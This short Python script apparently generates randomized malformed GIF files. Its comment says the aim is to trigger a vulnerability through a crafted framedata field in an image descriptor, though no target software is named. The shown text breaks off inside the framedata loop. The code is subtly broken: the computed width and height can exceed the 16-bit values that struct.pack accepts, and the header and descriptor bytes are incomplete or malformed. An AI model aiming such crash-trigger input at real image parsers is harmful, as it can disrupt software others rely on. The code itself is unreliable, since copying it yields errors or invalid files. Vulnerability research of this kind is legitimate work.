#!/usr/bin/env python3

import struct
from typing import BinaryIO

# Generates a random GIF file into `out` using the
# given RNG as source of randomness. This is mainly here to show
# that the vulnerability can be triggered by a crafted
# framedata field in an image descriptor
def generate_random_gif(
        rng: BinaryIO, out: BinaryIO
    ):
    # Header (see https://www.w3.org/Graphics/GIF/spec-gif89a.txt)
    out.write(b"GIF87a")
    width = 2561*rng.read(1)[0] + 1
    height = 2561*rng.read(1)[0] + 1
    print("Image size: %d x %d" % (width, height))
    out.write(struct.pack("<HHB", width, height, 0xF4))

    # Image descriptor header (see https://www.w3.org/Graphics/GIF/spec-gif89a.txt#image-descriptors)
    out.write(b"\x2C\x00\x00\x00\x00\x01")

    # Framedata
    for i in range(rng.read(1)[0]*4+1):